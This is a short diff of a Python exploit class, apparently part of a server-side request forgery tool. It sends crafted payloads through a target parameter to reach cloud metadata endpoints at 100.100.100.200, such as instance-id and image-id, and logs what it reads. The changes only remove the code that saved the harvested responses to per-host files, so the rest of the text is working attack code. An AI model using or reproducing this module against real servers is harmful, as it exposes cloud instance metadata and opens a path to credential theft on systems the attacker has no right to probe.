@@ -21,11 +21,6 @@ class exploit:
         if r != None:
             default = r.text
 
-            # Create directory to store files
-            directory = requester.host
-            if not os.path.exists(directory):
-                os.makedirs(directory)
-
             for endpoint in self.endpoints:
                 payload = wrapper_http(endpoint[1], endpoint[0], "80")
                 r = requester.do_request(args.param, payload)
@@ -36,19 +31,6 @@ class exploit:
                     logging.info("\033[32mReading file\033[0m : {}".format(payload))
                     logging.debug(diff)
 
-                    # Write diff to a file
-                    filename = endpoint[1].split("/")[-1]
-                    if filename == "":
-                        filename = endpoint[1].split("/")[-2:-1][0]
-
-                    logging.info(
-                        "\033[32mWriting file\033[0m : {} to {}".format(
-                            payload, directory + "/" + filename
-                        )
-                    )
-                    with open(directory + "/" + filename, "w") as f:
-                        f.write(diff)
-
     def add_endpoints(self):
         self.endpoints.add(("100.100.100.200", "latest/meta-data/instance-id"))
         self.endpoints.add(("100.100.100.200", "latest/meta-data/image-id"))
